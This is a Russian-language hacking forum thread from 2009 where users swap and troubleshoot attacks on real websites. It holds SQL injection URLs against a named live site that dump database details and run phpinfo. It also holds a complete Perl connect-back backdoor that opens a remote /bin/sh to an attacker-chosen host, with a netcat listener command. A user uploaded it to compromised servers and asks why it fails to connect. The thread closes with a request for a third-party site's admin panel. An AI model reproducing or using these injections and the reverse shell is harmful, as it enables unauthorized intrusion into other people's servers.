HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.10.2009, 12:15
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию

Цитата:
Сообщение от Shadrin  
Код:
http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
вот как бы,если это в виду имел
Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято.

Зачем знак комментария в конце? И без него то же самое отображает вроде

Последний раз редактировалось _iks_; 08.10.2009 в 12:19..
 
Ответить с цитированием

  #2  
Старый 08.10.2009, 13:40
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
По умолчанию

Цитата:
Сообщение от _iks_  
Зачем знак комментария в конце? И без него то же самое отображает вроде
я привык,не всегда нормально отображается без него
 
Ответить с цитированием

  #3  
Старый 08.10.2009, 12:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7 ,8,9,10,11,12,13,14/*
 
Ответить с цитированием

  #4  
Старый 08.10.2009, 14:55
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Не пойму почему не делается бек-коннект Делаю следующее...

У себя в cmd прописал start nc -l -p 80

Залил перловый бэкдор

Код:
#!/usr/bin/perl 
use IO::Socket; 
#IRAN HACKERS SABOTAGE Connect Back Shell 
#code by:LorD 
#We Are :LorD-C0d3r-NT 
# 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#Usage: dc.pl [Host] [Port] 
# 
#Ex: dc.pl 127.0.0.1 2121 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#[*] Resolving HostName 
#[*] Connecting... 127.0.0.1 
#[*] Spawning Shell 
#[*] Connected to remote host 

#bash-2.05b# nc -vv -l -p 2121 
#listening on [any] 2121 ... 
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121 
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#--==Systeminfo==-- 
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
# 
#--==Userinfo==-- 
#uid=1001(lord) gid=100(users) groups=100(users) 
# 
#--==Directory==-- 
#/root 
# 
#--==Shell==-- 
# 
$system = '/bin/sh'; 
$ARGC=@ARGV; 
print "--== Backdoor -=====- Hello Melkiy ==-- \n\n"; 
if ($ARGC!=2) { 
print "Usage: $0 [Host] [Port] \n\n"; 
die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "[*] Resolving HostName\n"; 
print "[*] Connecting... $ARGV[0] \n"; 
print "[*] Spawning Shell \n"; 
print "[*] Connected to remote host \n"; 
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; 
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; 
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
system($system); 
#EOF
С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80

И выдаёт:

--== Backdoor -=====- Hello Melkiy ==--

[-] Unable to Connect Host


В чём проблема?

P.S Пробовал другие порты, тоже самое...
 
Ответить с цитированием

  #5  
Старый 08.10.2009, 14:56
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Пинг с шелла идет на ваш IP?
 
Ответить с цитированием

  #6  
Старый 08.10.2009, 14:59
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от krypt3r  
Пинг с шелла идет на ваш IP?

Код:
C:\Documents and Settings\Администратор>ping ****.ru

Обмен пакетами с ****.ru [**.**.**.53] по 32 байт:

Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.
Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.

Статистика Ping для **.**.**.**:
    Пакетов: отправлено = 4, получено = 2, потеряно = 2 (50% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
 
Ответить с цитированием

  #7  
Старый 08.10.2009, 15:00
Vydi
Banned
Регистрация: 30.09.2009
Сообщений: 9
Провел на форуме:
107623

Репутация: 3
По умолчанию

Превышен интервал ожидания для запроса.
Ответ от **.**.**.**: Заданная сеть недоступна.

Подожди может
 
Ответить с цитированием

  #8  
Старый 08.10.2009, 15:23
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

еще вопрос... когда выполняю комманду perl perl.pl [свой IP] 80 сервер тухнет! в чем проблема?

[500] Internal Server Error

и так на каждом шелле не хочет делать бэк-коннект на мой комп, хотя нет, попробовал с деда - тоже самое

--

Это пиздец какой-то =( ни один сервер не может подключится...

Код:
--== Backdoor -=====- Hello Melkiy ==--

[-] Unable to Connect Host
в чём проблема-то?


//Разобрался

Последний раз редактировалось .:[melkiy]:.; 08.10.2009 в 17:08..
 
Ответить с цитированием

  #9  
Старый 08.10.2009, 18:29
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


По умолчанию

.:[melkiy]:.: может у тебя не выделенный ip адрес?
 
Ответить с цитированием

  #10  
Старый 08.10.2009, 18:38
Torentte
Новичок
Регистрация: 03.10.2009
Сообщений: 18
Провел на форуме:
190772

Репутация: 5
По умолчанию

Подскажите где сдесь админка?
_http://infosfera.sfo.ru/a/index.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.